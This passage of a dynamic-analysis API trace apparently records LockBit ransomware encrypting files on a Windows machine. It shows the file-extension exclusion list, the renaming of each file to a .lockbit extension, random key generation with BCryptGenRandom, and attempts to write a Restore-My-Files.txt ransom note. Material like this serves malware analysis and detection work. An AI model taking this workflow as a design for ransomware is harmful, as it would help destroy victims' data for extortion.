lpString2=".JPG") returned 1 [0143.768] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.lockbit") returned 72 [0143.768] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0143.773] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.773] malloc (_Size=0x40068) returned 0x3df0008 [0143.773] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=36792) returned 1 [0143.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0143.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0143.775] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0143.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.787] malloc (_Size=0xa6) returned 0x77d7a8 [0143.787] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.788] free (_Block=0x77d7a8) [0143.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.788] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5d84e00, ftCreationTime.dwHighDateTime=0x1c026b6, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5d84e00, ftLastWriteTime.dwHighDateTime=0x1c026b6, nFileSizeHigh=0x0, nFileSizeLow=0x8a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145879.JPG", cAlternateFileName="")) returned 1 [0143.788] lstrcmpiW (lpString1=".", lpString2="J0145879.JPG") returned -1 [0143.788] lstrcmpiW (lpString1="..", lpString2="J0145879.JPG") returned -1 [0143.788] PathFindExtensionW (pszPath="J0145879.JPG") returned=".JPG" [0143.788] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.789] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.789] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.790] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.790] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145879.JPG") returned 1 [0143.791] lstrcmpiW (lpString1="ntldr", lpString2="J0145879.JPG") returned 1 [0143.791] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145879.JPG") returned 1 [0143.791] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145879.JPG") returned -1 [0143.791] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145879.JPG") returned -1 [0143.791] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145879.JPG") returned 1 [0143.791] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145879.JPG") returned -1 [0143.791] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.791] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned=".JPG" [0143.791] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.791] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.791] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.791] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.792] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.792] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.792] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.792] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.792] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.lockbit") returned 72 [0143.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0143.797] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.797] malloc (_Size=0x40068) returned 0x1ff1e60 [0143.797] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=35419) returned 1 [0143.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0143.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0143.798] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.800] malloc (_Size=0xa6) returned 0x77d7a8 [0143.800] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.801] free (_Block=0x77d7a8) [0143.801] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.801] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.801] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7962500, ftCreationTime.dwHighDateTime=0x1c03d89, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7962500, ftLastWriteTime.dwHighDateTime=0x1c03d89, nFileSizeHigh=0x0, nFileSizeLow=0x84a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145895.JPG", cAlternateFileName="")) returned 1 [0143.801] lstrcmpiW (lpString1=".", lpString2="J0145895.JPG") returned -1 [0143.801] lstrcmpiW (lpString1="..", lpString2="J0145895.JPG") returned -1 [0143.801] PathFindExtensionW (pszPath="J0145895.JPG") returned=".JPG" [0143.801] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.801] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.802] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.802] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.803] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.803] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145895.JPG") returned 1 [0143.803] lstrcmpiW (lpString1="ntldr", lpString2="J0145895.JPG") returned 1 [0143.803] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145895.JPG") returned 1 [0143.803] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145895.JPG") returned -1 [0143.803] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145895.JPG") returned -1 [0143.803] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145895.JPG") returned 1 [0143.804] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145895.JPG") returned -1 [0143.804] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.804] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned=".JPG" [0143.804] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.804] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.804] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.805] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.805] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.lockbit") returned 72 [0143.805] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0143.806] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.806] malloc (_Size=0x40068) returned 0x3d70450 [0143.806] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=33958) returned 1 [0143.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0143.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0143.807] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0143.811] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.811] malloc (_Size=0xa6) returned 0x77d7a8 [0143.811] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.812] free (_Block=0x77d7a8) [0143.812] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.812] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.812] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912cb00, ftCreationTime.dwHighDateTime=0x1bdbf72, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa912cb00, ftLastWriteTime.dwHighDateTime=0x1bdbf72, nFileSizeHigh=0x0, nFileSizeLow=0x9a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145904.JPG", cAlternateFileName="")) returned 1 [0143.812] lstrcmpiW (lpString1=".", lpString2="J0145904.JPG") returned -1 [0143.812] lstrcmpiW (lpString1="..", lpString2="J0145904.JPG") returned -1 [0143.812] PathFindExtensionW (pszPath="J0145904.JPG") returned=".JPG" [0143.812] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.812] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.812] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.812] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.812] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".ics", 